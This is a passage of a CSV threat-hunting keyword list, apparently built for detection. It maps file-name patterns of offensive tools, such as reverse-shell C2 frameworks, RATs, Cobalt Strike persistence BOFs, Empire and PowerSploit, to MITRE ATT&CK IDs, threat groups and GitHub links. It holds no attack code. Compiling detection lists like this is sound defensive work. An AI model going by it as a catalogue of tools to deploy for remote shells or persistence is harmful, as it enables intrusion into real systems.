-*perl_no_sh_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*perl-reverse-shell.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*PersAutorun.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PersCLRInstall.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*persist exceladdin*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*persist logonscript*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*persist run *hkcu*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*persist run *hklm*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*persist runkey*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,0,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*persist spe *.exe*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Persist.cna*,offensive_tool_keyword,AggressorScripts-1,persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+,T1074 - T1070 - T1105 - T1558,TA0007 - TA0003 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence,1,1,N/A,N/A,1,1,1,2018-06-24T16:27:57Z,2019-10-18T12:56:35Z -*Persist\autorun.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*Persist\eventviewer.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*Persist\powershell.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*Persist\screensaver.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*Persist\startup.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*Persist\winlogon.cs*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,0,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*PersistBOF.cna*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*Persistence.cpp*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*Persistence.exe*,offensive_tool_keyword,DNS-Persist,DNS-Persist is a post-exploitation agent which uses DNS for command and control.,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/DNS-Persist,1,1,N/A,10,10,211,75,2017-11-20T08:53:25Z,2017-11-10T15:23:49Z -*Persistence.psm1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Persistence.psm1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1117,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Persistence.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Persistence/InstallWMI*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Persistence_AccountManipulation_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_Guard_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_LogonScripts_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_NewService_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_OfficeApplicationStartup_OfficeTest.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_Other_WindowsLibraryMs.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_RegistryRunKeys_SharpHide.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_RegistryRunKeys_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_ScheduledTask_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Persistence_WinlogonHelperDLL_Windows.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*PersistenceBOF.c*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*PersistenceBOF.exe*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persistent-security/SMShell*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,1,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*persist-ice-junction.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-monitor.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-shortcut.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-time.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*persist-ice-xll.o*,offensive_tool_keyword,cobaltstrike,A BOF to automate common persistence tasks for red teamers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/IcebreakerSecurity/PersistBOF,1,1,N/A,10,10,222,41,2023-03-07T11:23:42Z,2022-03-29T14:50:47Z -*PersStartup.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PEScrambler.exe*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*PetitPotam.cna*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - 